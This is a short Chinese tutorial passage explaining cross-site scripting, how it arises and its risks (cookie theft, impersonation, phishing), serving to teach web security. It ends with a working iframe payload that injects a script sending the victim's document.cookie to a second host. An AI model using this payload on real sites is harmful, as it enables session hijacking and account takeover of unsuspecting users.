跨站脚本
错误消息导致的信息泄露
跨站脚本
通常情况下,在web应用的网页中,有些部分的显示内容会依据外界输入值而发生变化(会反弹恶意代码),
而如果生成这些html的程序中存在问题,就会滋生名为名为跨站脚本(Cross-Site Scripting)的安全隐患。
由于它和知名的CSS缩写冲突,所以经常缩写为XSS
web应用若存在XSS漏洞,就会有下列风险。
用户的浏览器中运行攻击者的恶意脚本,从而导致Cookie信息被窃取,用户身份被冒名顶替
攻击者能获得用户的权限来恶意使用web应用的功能
向用户显示伪造的输入表单,通过钓鱼式攻击窃取用户的个人信息
<iframe width=320 height=100 src="http://www.qytang.com/WAS/2.页面显示的相关问题/3.XSS窃取Cookie值.php?keyword=<script>window.location='http://www.qytphp.com/WAS/2.页面显示的相关问题/3.XSS窃取Cookie值.php?sid='%2Bdocument.cookie;</script>"> </iframe>